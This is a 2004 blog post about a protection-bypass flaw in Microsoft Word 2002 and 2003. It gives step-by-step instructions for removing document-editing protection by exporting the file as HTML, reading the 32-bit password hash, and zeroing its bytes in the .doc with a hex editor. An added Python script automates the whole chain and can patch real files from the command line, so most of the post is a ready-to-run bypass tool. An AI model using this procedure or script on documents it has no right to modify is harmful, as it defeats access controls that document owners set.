Wednesday, January 07, 2004

Protection-bypass vulnerability in MS Word ...

Microsoft Word 2003 and 2002 contain a protection-bypass vulnerability. By following the simple procedure outlined below, a user can unprotect a protected document without a password cracker or any other special tools. :(

Note what "protected" means here: this is the document-protection password set via Tools, Protect Document (the one that restricts editing to forms, tracked changes or comments), not the file-open password that encrypts the document. Word stores only a 32-bit hash of the protection password inside the .doc, and the Save As Web Page export writes that same hash out as a readable tag, which is what the steps below take advantage of. The file-open password is not affected by this trick.

This bug was discovered by Thorsten Delbrouck.

To see the bug for yourself, follow the demonstration below.

1.) Open a protected document in Word.
2.) Choose File, Save As, pick the Web Page (*.htm; *.html) type, save, and close Word.
3.) Open the resulting HTML file in any text editor.

4.) Search for the <w:UnprotectPassword> tag. You should find a line like <w:UnprotectPassword>ABCDEF01</w:UnprotectPassword>. Note the eight hex digits: this is the 32-bit hash of the protection password, not the password itself, but it is all you need.

5.) Open the original .doc (work on a copy) in any hex editor.
6.) Search for the hash bytes in reverse order. The value is stored as a little-endian 32-bit integer, so ABCDEF01 appears in the file as the byte sequence 01 EF CD AB.
7.) Overwrite those four bytes with 0x00 (a zero hash is what Word stores for "no password"). Save and close.

8.) Open the patched document in Word and select Tools, Unprotect Document. Leave the password blank; the protection is removed.
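The same steps 4 through 7, automated in Python as an added example (this is not code from the original post or from the bug's discoverer). The function names extract_unprotect_hash, hash_to_doc_bytes and patch_doc_copy are my own, and the HTML snippet and the fake .doc bytes at the bottom are constructed for illustration (only the OLE file signature and the placeholder hash ABCDEF01 from the post are real values). The script reports how many times the four-byte pattern occurred so you can spot a false match before trusting the patched file.

```python
"""Automate the Word protection-password zeroing described in the post.

Added example, not from the original post.  Function names and the sample
data below are constructed for illustration.
"""
import re
import sys

# Step 4: the Save-As-Web-Page output carries the 32-bit hash as 8 hex digits.
HASH_TAG = re.compile(r"<w:UnprotectPassword>([0-9A-Fa-f]{8})</w:UnprotectPassword>")


def extract_unprotect_hash(html: str) -> str:
    """Return the 8-hex-digit protection hash from Word's HTML export."""
    m = HASH_TAG.search(html)
    if not m:
        raise ValueError("no <w:UnprotectPassword> tag found; document may be unprotected")
    return m.group(1).upper()


def hash_to_doc_bytes(hex_hash: str) -> bytes:
    """Steps 5/6: the hash lives in the .doc as a little-endian 32-bit integer,
    so 'ABCDEF01' is found in the file as bytes 01 EF CD AB."""
    return int(hex_hash, 16).to_bytes(4, "little")


def patch_doc_copy(doc: bytes, hex_hash: str) -> tuple[bytes, int]:
    """Step 7: overwrite every occurrence of the four hash bytes with 0x00.

    Returns the patched bytes and the number of occurrences replaced.  A count
    other than 1 means the pattern also matched unrelated data, so inspect the
    file in a hex editor before relying on the result.
    """
    needle = hash_to_doc_bytes(hex_hash)
    count = doc.count(needle)
    if count == 0:
        raise ValueError("hash bytes %s not found in document" % needle.hex())
    return doc.replace(needle, b"\x00" * len(needle)), count


# Constructed sample input standing in for the real files.
SAMPLE_HTML = (
    "<w:WordDocument><w:View>Print</w:View>"
    "<w:UnprotectPassword>ABCDEF01</w:UnprotectPassword>"
    "</w:WordDocument>"
)
# Real OLE2 signature, then filler, then the little-endian hash, then filler.
SAMPLE_DOC = (
    b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
    + b"\x00" * 8
    + b"\x01\xef\xcd\xab"
    + b"\x11\x22\x33\x44"
)


def demo() -> int:
    """Run the whole chain on the constructed sample; returns the match count."""
    hex_hash = extract_unprotect_hash(SAMPLE_HTML)
    patched, count = patch_doc_copy(SAMPLE_DOC, hex_hash)
    assert hash_to_doc_bytes(hex_hash) not in patched
    return count


if __name__ == "__main__":
    # Usage on real files: python script.py exported.htm protected.doc out.doc
    if len(sys.argv) == 4:
        with open(sys.argv[1], "r", encoding="utf-8", errors="ignore") as f:
            h = extract_unprotect_hash(f.read())
        with open(sys.argv[2], "rb") as f:
            patched, count = patch_doc_copy(f.read(), h)
        with open(sys.argv[3], "wb") as f:
            f.write(patched)
        print("hash %s zeroed at %d location(s); wrote %s" % (h, count, sys.argv[3]))
    else:
        print("sample run: hash pattern replaced %d time(s)" % demo())
```

Run it without arguments to exercise the constructed sample, or pass the exported .htm, the original .doc and an output path to patch a real file; the original is never written to.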

